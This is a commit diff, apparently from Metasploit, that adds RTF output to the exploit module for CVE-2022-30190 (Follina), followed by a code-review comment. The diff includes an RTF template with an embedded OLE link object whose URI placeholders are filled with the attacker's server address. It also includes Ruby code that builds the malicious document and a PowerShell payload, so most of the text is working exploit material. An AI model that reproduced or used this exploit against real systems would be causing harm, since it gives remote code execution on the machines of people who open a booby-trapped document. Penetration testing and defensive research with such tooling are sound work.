Add rtf support to cve-2022-30190 AKA Follina
parent
c7820048cd
commit
ef9f5ca463
30
data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
Normal file
30
data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
|
||||||
|
\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
|
||||||
|
{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
|
||||||
|
{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
|
||||||
|
4f4c45324c696e6b000000000000000000000c0000
|
||||||
|
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
|
||||||
|
70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
|
||||||
|
00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
|
||||||
|
8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
|
||||||
|
0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
|
||||||
|
}}}}
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
include Msf::Exploit::FILEFORMAT
|
include Msf::Exploit::FILEFORMAT
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
include Msf::Post::File
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
@ -61,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
|
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
|
||||||
|
OptEnum.new('OUTPUT_FORMAT', [true, 'Obfuscate JavaScript content.', 'docx', %w[docx rtf]]),
|
||||||
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
|
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
@ -174,27 +176,50 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
Msf::Util::EXE.to_zip(@docx)
|
Msf::Util::EXE.to_zip(@docx)
|
||||||
end
|
end
|
||||||
|
|
||||||
def primer
|
def build_rtf
|
||||||
print_status('Generating a malicious docx file')
|
print_status('Generating a malicious rtf file')
|
||||||
|
|
||||||
@proto = (datastore['SSL'] ? 'https' : 'http')
|
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
|
||||||
|
uri_space = 76
|
||||||
|
if uri.length > 76
|
||||||
|
fail_with(Failure::BadConfig, 'The total URI must be under 75 characters')
|
||||||
|
end
|
||||||
|
uri_ascii = uri.each_byte.map { |b| b.to_s(16) }.join
|
||||||
|
uri_ascii << '0' * ((uri_space * 2) - uri_ascii.length)
|
||||||
|
# This is terrible, but will work for a test
|
||||||
|
uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join
|
||||||
|
uri_utf16 << '0' * ((uri_space * 4) - uri_utf16.length)
|
||||||
|
rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_ascii)
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16)
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)
|
||||||
|
file_create(rtf_file_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
def build_docx
|
||||||
|
print_status('Generating a malicious docx file')
|
||||||
|
|
||||||
template_path = get_template_path
|
template_path = get_template_path
|
||||||
unless File.extname(template_path).downcase.end_with?('.docx')
|
unless File.extname(template_path).downcase.end_with?('.docx')
|
||||||
fail_with(Failure::BadConfig, 'Template is not a docx file!')
|
fail_with(Failure::BadConfig, 'Template is not a docx file!')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Using template '#{template_path}'")
|
|
||||||
@docx = unpack_docx(template_path)
|
@docx = unpack_docx(template_path)
|
||||||
|
|
||||||
print_status('Injecting payload in docx document')
|
print_status('Injecting payload in docx document')
|
||||||
inject_docx
|
inject_docx
|
||||||
|
|
||||||
print_status("Finalizing docx '#{datastore['FILENAME']}'")
|
print_status("Finalizing docx '#{datastore['FILENAME']}'")
|
||||||
file_create(pack_docx)
|
file_create(pack_docx)
|
||||||
|
end
|
||||||
|
|
||||||
|
def primer
|
||||||
|
@proto = (datastore['SSL'] ? 'https' : 'http')
|
||||||
|
|
||||||
|
if datastore['OUTPUT_FORMAT'] == 'rtf'
|
||||||
|
build_rtf
|
||||||
|
else
|
||||||
|
build_docx
|
||||||
|
end
|
||||||
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
|
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
|
||||||
|
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
|
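Review bot: In build_rtf the length guard compares against the literal `76` although `uri_space = 76` is declared on the line just above it, and the error message says the URI "must be under 75 characters" while a 76-character URI passes the check; the guard should read `if uri.length > uri_space` / `fail_with(Failure::BadConfig, "The total URI must be at most #{uri_space} characters")` / `end` so the limit, the message and the padding arithmetic agree. The hex encoding `b.to_s(16)` produces a single digit for bytes below 0x10; the URI is assembled from SRVHOST, SRVPORT and the resource path so that is unlikely in practice, but `format('%02x', b)` keeps the `uri_space * 2` and `uri_space * 4` padding exact for any byte value. In the register_options hunk, the new OUTPUT_FORMAT option carries OBFUSCATE's description 'Obfuscate JavaScript content.', which should be replaced with something like `'The output file format.'`. The added `include Msf::Post::File` is not used by any new code visible in these hunks (file_create comes from the already-included FILEFORMAT mixin), so it is worth confirming whether it is needed elsewhere in the module before keeping it. build_rtf, build_docx and primer are complete within the third hunk; the enclosing MetasploitModule class starts and ends outside it.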